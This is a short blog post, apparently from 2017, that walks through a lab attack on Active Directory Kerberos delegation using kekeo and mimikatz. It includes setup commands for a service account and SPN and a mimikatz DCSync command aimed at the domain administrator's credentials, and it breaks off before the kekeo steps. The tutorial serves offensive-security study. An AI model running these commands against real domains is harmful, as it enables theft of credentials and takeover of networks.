quarta-feira, 16 de agosto de 2017

kekeo? where are you?

Sometimes, I find security related posts annoying and frustrating. When I try to reproduce their POC, sometimes there's no enough info, other times the tools they reference, don't exist anymore. This is the case for kekeo. Every single post I can find, uses two tools that I can not use, because they don't exist anymore: s4u.exe and asktgt.exe. These tools where merged to a single one, and I wasn't able to find anything on the new syntax. All I could find was one guy complaining about the ticket generated by the new tool didn't have the forward flag active. That's why this tutorial was posted, to document the full attack to unconstrained delegation, step by step, in a reproducible way. Let's begin.

Context: We have 2 DCs: dc01 and dc02. Domain name is contoso.loca. We will be using a service account named popo, registered with spn http/popo. We will grant delegation permissions to this account and will use it to obtain an AD admin token to dump user credential using dcsync.

1. Create the AD account that will be used as a delegated priviledged serviceNew-ADUser -Name "popo" -UserPrincipalName popo

2. Change the user passwordnet user popo popo!!popo /dom

3. Add the spnsetspn -S http/popo popo

4. Add delegation permissions using dsa.msc. I added the permissions to transition protocol to ldap/dc01.contoso.loca, so that we can dump passwords from this service.

We now have everything we need to begin our tests. Let's first try to dump the domain administrator credentials from popo session. To do this, open mimikatz, and run:

lsadump::dcsync /domain:contoso.loca /user:CONTOSO\administrator

As you can see, access denied, as expected so far.
Now, here enters kekeo, run kekeo.exe and: